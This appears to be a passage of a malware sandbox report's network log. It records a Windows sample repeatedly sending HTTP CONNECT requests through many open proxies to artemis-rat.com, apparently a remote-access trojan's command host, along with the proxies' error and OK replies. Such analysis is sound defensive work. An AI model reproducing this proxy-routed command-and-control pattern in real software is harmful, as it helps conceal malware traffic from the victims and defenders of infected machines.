                                              1634192.168.2.45039388.202.230.103464757284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.917836905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.053915977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1635192.168.2.45448445.195.149.7910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.918173075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1636192.168.2.453056104.200.135.4641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.919420958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1637192.168.2.455033194.4.50.61123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.919734001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1638192.168.2.45503638.162.25.10631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.920079947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.330450058 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1639192.168.2.454972171.250.218.11310807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.920083046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1640192.168.2.45491936.134.91.8288887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.920238018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.163427114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1641192.168.2.454309201.91.82.15531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.920917034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.053945065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.142255068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.293262959 CET19INHTTP/1.1 200 OK
                                              Mar 11, 2024 08:38:36.471888065 CET208INHTTP/1.0 504 Gateway Timeout
                                              Content-Length: 718
                                              Content-Type: text/html
                                              Date: Mon, 11 Mar 2024 07:35:31 GMT
                                              Expires: Mon, 11 Mar 2024 07:35:31 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1642192.168.2.454394132.148.154.97603497284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.921250105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.053996086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.142255068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.163327932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.256848097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:01.256828070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:13.335103035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:37.335118055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1643192.168.2.454968103.63.190.7280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.921399117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1644192.168.2.45509138.162.14.2631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.921683073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.352860928 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1645192.168.2.455154104.17.9.114807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.921880007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.076082945 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1646192.168.2.455155172.67.25.204807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.922389030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.076961040 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1647192.168.2.45500183.243.92.15480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.923221111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1648192.168.2.45053592.204.134.38307477284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.927097082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.568639994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.163598061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366573095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.574896097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.866748095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.163374901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1649192.168.2.450355191.7.208.3280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.928853035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.053967953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.054375887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.069546938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.751599073 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1650192.168.2.45501451.83.184.24191917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.928886890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.731641054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.843708038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.906295061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.960169077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.053946972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.067795992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.069360018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:05.022448063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1651192.168.2.455166162.159.246.135807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.929075003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.089993954 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1652192.168.2.45516347.88.3.1980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.932168007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.103593111 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.23.4
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1653192.168.2.45502898.181.137.8341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.945342064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1654192.168.2.45511745.196.148.5254327284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.947455883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.165364981 CET308INHTTP/1.1 407 Proxy Authentication Required
                                              Server: FaaS v1.3-20220203-7fa38bd5af
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 65
                                              Proxy-Authenticate: Basic realm="Proxy"
                                              Connection: close
                                              Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                              Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1655192.168.2.45323958.69.117.280827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.960844994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1656192.168.2.455178104.19.109.209807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.961436987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.569946051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
